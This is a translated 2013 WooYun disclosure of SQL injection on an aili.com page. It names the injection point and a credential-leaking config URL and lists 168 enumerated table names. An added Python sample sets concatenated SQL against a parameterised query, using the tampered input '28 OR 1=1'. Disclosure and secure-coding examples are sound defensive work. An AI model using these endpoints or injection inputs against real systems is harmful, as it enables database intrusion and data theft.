Vulnerability summary

Defect ID: wooyun-2013-018923

Title: SQL injection on an aili.com (爱丽网) site

Vendor: aili.com

Author: 小胖子

Submitted: 2013-02-20 09:58

Fixed: 2013-04-06 09:59

Published: 2013-04-06 09:59

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2013-02-20: Details sent to the vendor; awaiting vendor handling
2013-02-20: Vendor confirmed; details disclosed to the vendor only
2013-03-02: Details disclosed to core white hats and experts in the relevant field
2013-03-12: Details disclosed to regular white hats
2013-03-22: Details disclosed to intern white hats
2013-04-06: Details disclosed to the public

Summary:

We are all sharpshooters: every gift takes out one vulnerability!

Detailed description:

To avoid a duplicate I specifically asked 剑心 before posting this. Welcome to the new vendor; I hope you take information security seriously!
Issue 1: a configuration-file error leaks the SQL database account and password. Unfortunately it is an internal-network address.
http://plus.aili.com/1/1/gif.php

[Screenshot: SQLerr.jpg]

Issue 2: SQL injection. There is a lot of data; reading it took forever!
Injection point: http://plus.aili.com/pk.php?a=list&id=28

[Screenshot: biao.jpg]

[Screenshot: biao2.jpg]

[Screenshot: SQL3.jpg]

I won't list everything one by one; the details are as follows.

Database: newcms
[168 tables]
+---------------------------+
| 7120_eastdata_sp |
| 7120_eastdata_ty |
| 7120_eastmedicine_sort |
| 7120_illnessbase |
| 7120_illtype |
| 7120_part |
| 7120_westdata_sp |
| 7120_westdata_ty |
| 7120_westmedicine_sort |
| Jewelry_arc_image |
| Jewelry_archives |
| Jewelry_category |
| Jewelry_vote_config |
| admin |
| admin_arc_upid |
| admin_count |
| admin_panel |
| admin_role |
| admin_role_cat |
| admin_role_priv |
| aili_adsell_brand |
| aili_adsell_type |
| aili_member |
| aili_member_field |
| aili_member_visit |
| aili_store |
| ailimap |
| album_contents |
| albums |
| app_arc_topic |
| app_archives |
| app_channel |
| app_feedback |
| app_images |
| app_topic |
| app_version |
| arc_channel |
| arc_column |
| arc_flag |
| arc_flag_img |
| arc_index |
| arc_recom |
| arc_topic |
| archive_count |
| archive_total |
| archives |
| archives_gq |
| archives_jk |
| articles |
| articles_img |
| articles_play_bak |
| authors |
| block |
| block_art |
| category_priv |
| channel_count |
| channel_total |
| channels |
| collection_content |
| collection_history |
| collection_node |
| collection_program |
| column_count |
| column_order_relation |
| column_total |
| columns |
| comment_bq |
| comment_total |
| comments |
| comments_topic |
| crontab |
| domainip |
| enterprise |
| enterprise_case |
| enterprise_evaluate |
| enterprise_evaluate_score |
| enterprise_info |
| enterprise_level |
| enterprise_type |
| exam_form |
| exam_form_element |
| exam_student |
| exam_student_title |
| exam_title |
| favorites |
| flag |
| friend_link |
| friend_link_class |
| haina_test |
| help |
| help_type |
| history_log |
| homepage |
| hot_tags |
| hot_tags_class |
| images |
| imgs |
| index_count |
| keylist |
| keywords |
| log_albums |
| log_arccreate |
| log_articles |
| log_channels |
| log_columns |
| log_create |
| log_images |
| log_login |
| log_sys |
| log_templet_category |
| log_templets |
| log_topics |
| log_votes |
| mango_field |
| mango_member |
| mango_vote_config |
| menu |
| message |
| msnad |
| navigation |
| new_vote_main |
| new_vote_option |
| new_vote_problem |
| pctag |
| pk_cdata |
| pk_cdata_log |
| pk_comment |
| pk_comment_log |
| pk_tdata |
| pk_tdata_log |
| pk_themes |
| rtss |
| source |
| suggest |
| sys_config |
| sys_config_group |
| tags |
| tags_arc |
| tags_category |
| tags_log |
| tags_relation |
| tags_upid |
| tagscate_channel |
| task |
| task_log |
| templet_canedit |
| templet_category |
| templets |
| topic_block |
| topic_block_style |
| topic_count |
| topic_diy_data |
| topic_diy_tpl |
| topic_hallowmas_ip |
| topic_hallowmas_user |
| topic_history |
| topic_lab_user |
| topic_pic |
| topic_total |
| topics |
| tpl_history |
| tpl_type |
| vote |
| vote_comments |
| vote_count |
| vote_option |
| webnav |
| webnav_class |
+---------------------------+

Proof of vulnerability:

See the detailed description.

Suggested fix:

Filter the input, dear. One gift eliminates one vulnerability? Asking for a gift, asking for rank 20!
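What "filter the input" means in practice for the `pk.php?a=list&id=28` endpoint, as an added example that is not part of the original report and not the vendor's code: the page's handler is PHP, but the same pattern is modelled here in Python with sqlite3 so it runs stand-alone. The table `pk_themes_demo`, its columns and rows are constructed sample data, not data from the report. The vulnerable function pastes the raw `id` value into the SQL text; the hardened one allow-lists `id` as a plain integer and binds it as a query parameter, so the value can never become SQL syntax.

```python
"""
Added example (not from the original WooYun report): an unvalidated,
concatenated `id` parameter beside the hardened form of the same handler.
Modelled in Python/sqlite3; the real endpoint on the page is PHP.
"""
import re
import sqlite3

# Allow-list: the `id` query-string value must be 1 to 10 decimal digits.
_INT_RE = re.compile(r"^[0-9]{1,10}$")


def make_demo_db() -> sqlite3.Connection:
    """In-memory database holding constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pk_themes_demo (id INTEGER PRIMARY KEY, title TEXT)"
    )
    conn.executemany(
        "INSERT INTO pk_themes_demo (id, title) VALUES (?, ?)",
        [(27, "theme 27"), (28, "theme 28"), (29, "theme 29")],
    )
    conn.commit()
    return conn


def is_valid_id(id_param: str) -> bool:
    """True only when the parameter is a plain positive integer string."""
    return _INT_RE.fullmatch(id_param) is not None


def list_unsafe(conn: sqlite3.Connection, id_param: str) -> list:
    """Vulnerable pattern: the raw request value becomes part of the SQL text.
    Any non-numeric input changes the structure of the query, which is the
    defect the report describes at pk.php?a=list&id=28."""
    sql = "SELECT id, title FROM pk_themes_demo WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def list_safe(conn: sqlite3.Connection, id_param: str) -> list:
    """Hardened handler: reject anything that is not an integer, then pass
    the value as a bound parameter instead of splicing it into the query."""
    if not is_valid_id(id_param):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title FROM pk_themes_demo WHERE id = ?"
    return conn.execute(sql, (int(id_param),)).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    print("safe, id=28:", list_safe(db, "28"))
    # The same non-numeric input: the unsafe builder returns every row,
    # the hardened handler refuses it before any SQL is built.
    print("unsafe, tampered id:", list_unsafe(db, "28 OR 1=1"))
    try:
        list_safe(db, "28 OR 1=1")
    except ValueError as exc:
        print("safe, tampered id rejected:", exc)
```

The integer allow-list is the cheap first line of defence for a numeric `id`; the parameterised query is the one that actually removes the vulnerability class, and it is the part to keep even for free-text parameters where an allow-list is not possible.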

Copyright notice: when reposting, please credit the source, 小胖子@乌云.


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2013-02-20 10:22

Vendor reply:

Thank you, 小胖子. Information security is very important to us.

Latest status:

None yet